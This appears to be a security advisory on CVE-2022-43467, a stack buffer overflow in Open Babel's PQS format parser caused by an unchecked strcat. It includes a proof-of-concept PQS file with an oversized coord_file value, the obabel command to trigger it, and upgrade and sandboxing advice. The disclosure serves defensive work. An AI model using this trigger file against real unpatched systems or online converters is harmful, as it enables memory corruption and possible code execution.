high · 7.8CVE-2022-43467Jul 1, 2026

CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A crafted PQS chemistry file can overflow a fixed-size stack buffer in Open Babel's parser, enabling arbitrary code execution in any application that opens untrusted chemical files.

Packageopenbabel
Ecosystempip
Affected< 3.2.0
Fixed in3.2.0

The problem

The PQS format reader in PQSformat.cpp declares two fixed-size stack buffers: `char coord_file[256]` and `char full_coord_path[256]`. When it encounters a `geom` keyword it reads the coord_file specifier from the input line and concatenates it into `full_coord_path` using `strcat`, with no length check.

Any caller of the Open Babel library is exposed: the `obabel` CLI, the `OBConversion` C++ API, and all language bindings (Python, Ruby, Java, R, Perl, C#, PHP). Because online chemistry converters commonly embed the library server-side, the attack surface extends beyond local file open.

Proof of concept

A working proof-of-concept for CVE-2022-43467 in openbabel, with the exact payload below.

text
# strcat.pqs  --  triggers CVE-2022-43467
# Feed to:  obabel -i pqs strcat.pqs -o sdf
#
# The coord_file value is 260 'A' characters, overflowing the
# 256-byte full_coord_path stack buffer via strcat().
geom=file coord_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$basis
 sto-3g
$end
$molecule
 0 1
 H  0.0  0.0  0.0
 H  0.0  0.0  0.7
$end

The parser scans for a line containing `geom` (but not `text` or `titl`), then extracts the `coord_file` token from that same line. It calls `strcat(full_coord_path, coord_file)` to build the final path. Because `full_coord_path` is only 256 bytes and no length check gates the concatenation, a coord_file token longer than 255 bytes writes past the end of the stack buffer (CWE-787, CWE-119).

The ASAN report from Talos shows `WRITE of size 251` at `__interceptor_strcat` called from `PQSformat.cpp:234`, confirming a classic unbounded `strcat` overflow. The fix in commit 2a7d2cda replaces the raw `strcat` with a bounds-checked alternative (or switches to `std::string`), so oversized coord_file values are rejected before any write occurs.

The fix

Upgrade openbabel to 3.2.0, which contains commit 2a7d2cda. If you cannot upgrade immediately, refuse to parse PQS files from untrusted sources, or wrap the `OBConversion` call in a sandboxed process. Distributions (Debian, Fedora, etc.) have the fix tracked; check your distro's security tracker for backported packages.

Reported by Claudio Bozzato, Cisco Talos.

References: [1][2][3][4][5][6]

Related research